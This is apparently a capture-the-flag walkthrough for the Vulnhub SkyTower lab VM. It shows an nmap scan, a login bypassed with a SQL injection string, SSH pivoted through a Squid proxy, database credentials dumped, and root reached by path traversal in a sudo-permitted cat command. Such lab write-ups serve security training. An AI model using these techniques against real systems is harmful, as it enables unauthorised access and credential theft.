Vulnhub Machine SkyTower Walkthrough OSCP friendly/ No
Metasploit
Nmap:
# Nmap 7.70 scan initiated Thu
Aug 8 02:55:03 2019 as: nmap -sC -sV -p-
-oN nmap 192.168.8.183
Nmap scan report for SkyTower
(192.168.8.183)
Host is up (0.0019s latency).
Not shown: 65532 closed ports
PORT STATE
SERVICE VERSION
22/tcp filtered ssh
80/tcp open
http Apache httpd 2.2.22
((Debian))
|_http-server-header: Apache/2.2.22
(Debian)
|_http-title: Site doesn't have a
title (text/html).
3128/tcp open http-proxy Squid http proxy 3.1.20
| http-open-proxy: Potentially OPEN
proxy.
|_Methods supported: GET HEAD
|_http-server-header: squid/3.1.20
|_http-title: ERROR: The requested
URL could not be retrieved
MAC Address: 08:00:27:54:4A:37
(Oracle VirtualBox virtual NIC)
Service detection performed. Please
report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Aug 8 02:55:57 2019 -- 1 IP address (1 host up)
scanned in 54.69 seconds
We have SSH filtered and a Squid HTTP proxy on port 3128,
most probably the SSH is behind proxy, lets check it later. First the WebServer.
We have login page, so lets try common creds and sqli.
On Trying sqli the server give us an error but also telling
us some characters are filtered. Trying multiple characters , the string test’ || 1=1# worked. So user test@test and password test’ || 1=1# .
We got login credentials for user john, lets try to use it
in ssh.
First of all we need to access ssh through proxy, there are
two ways,
One is by using proxytunnel
proxytunnel -p 192.168.8.183:3128 -d 192.168.8.183:22
-a 1234
Second it by proxychains, by adding the below give in
/etc/proxychains.conf
and
proxychains ssh john@192.168.8.183
Our session got termed as soon as it was connected.
This give us a new bash shell upon connection, first thing
to do
So that condition of immediate termination is removed.
Goto /var/www and there are mysql database credentials as
root:root.
We can find this out by downloading LinEnum.sh script via
wget and execute it.
Login into mysql by
In Mysql
show databases;
use SkyTech;
show tables;
mysql> select * from login;
+----+---------------------+--------------+
| id | email | password |
+----+---------------------+--------------+
|
1 | john@skytech.com |
hereisjohn |
|
2 | sara@skytech.com |
ihatethisjob |
|
3 | william@skytech.com | senseable
|
+----+---------------------+--------------+
3 rows in set (0.01 sec)
Lets login as sara.
proxychains ssh sara@192.168.8.183
/bin/bash
ProxyChains-3.1
(http://proxychains.sf.net)
|S-chain|-<>-192.168.8.183:3128-<><>-192.168.8.183:22-<><>-OK
sara@192.168.8.183's password:
id
uid=1001(sara) gid=1001(sara)
groups=1001(sara)
We checked sara’s privileges by sudo -l
Matching Defaults entries for sara
on this host:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User sara may run the following
commands on this host:
(root) NOPASSWD: /bin/cat /accounts/*, (root) /bin/ls /accounts/*
So we can use sudo only for
/bin/cat and /accounts/*
sudo /bin/ls /accounts/../root
flag.txt
sudo /bin/cat
/accounts/../root/flag.txt
Congratz, have a cold one to
celebrate!
root password is theskytower
We have root credentials as root:theskytower.
574r570rm